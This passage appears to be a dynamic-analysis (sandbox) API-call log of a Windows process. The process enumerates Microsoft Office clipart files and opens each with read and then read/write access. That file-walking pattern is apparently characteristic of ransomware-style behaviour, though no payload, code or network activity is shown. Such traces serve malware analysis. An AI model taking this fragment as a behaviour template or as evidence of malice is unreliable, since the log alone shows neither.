returned 0x88748 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.947] AreFileApisANSI () returned 1 [0100.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a958 [0100.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 69 [0100.948] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd32)) returned 1 [0100.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0100.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0100.948] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.948] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.948] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc30, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00176_.GIF", cAlternateFileName="")) returned 1 [0100.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0100.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0100.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0100.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0100.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0100.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0100.949] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.949] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0100.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.950] AreFileApisANSI () returned 1 [0100.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0100.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.950] AreFileApisANSI () returned 1 [0100.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8abb8 [0100.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 69 [0100.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.951] GetFileType (hFile=0x27c) returned 0x1 [0100.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0100.951] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.951] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.951] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.951] CloseHandle (hObject=0x27c) returned 1 [0100.952] AreFileApisANSI () returned 1 [0100.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0100.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 69 [0100.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.952] GetFileType (hFile=0x27c) returned 0x1 [0100.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0100.952] CloseHandle (hObject=0x27c) returned 1 [0100.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0100.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0100.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0100.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0100.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0100.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.953] AreFileApisANSI () returned 1 [0100.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0100.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 69 [0100.954] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc30)) returned 1 [0100.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0100.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0100.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.954] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbd2, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN00010_.WMF", cAlternateFileName="")) returned 1 [0100.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0100.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0100.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0100.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0100.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0100.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.954] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0100.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.955] AreFileApisANSI () returned 1 [0100.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF", lpUsedDefaultChar=0x0) returned 69 [0100.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0100.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.955] AreFileApisANSI () returned 1 [0100.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0100.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 69 [0100.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.955] GetFileType (hFile=0x27c) returned 0x1 [0100.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0100.955] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.956] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.956] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.956] CloseHandle (hObject=0x27c) returned 1 [0100.956] AreFileApisANSI () returned 1 [0100.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0100.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 69 [0100.956] CreateFileW 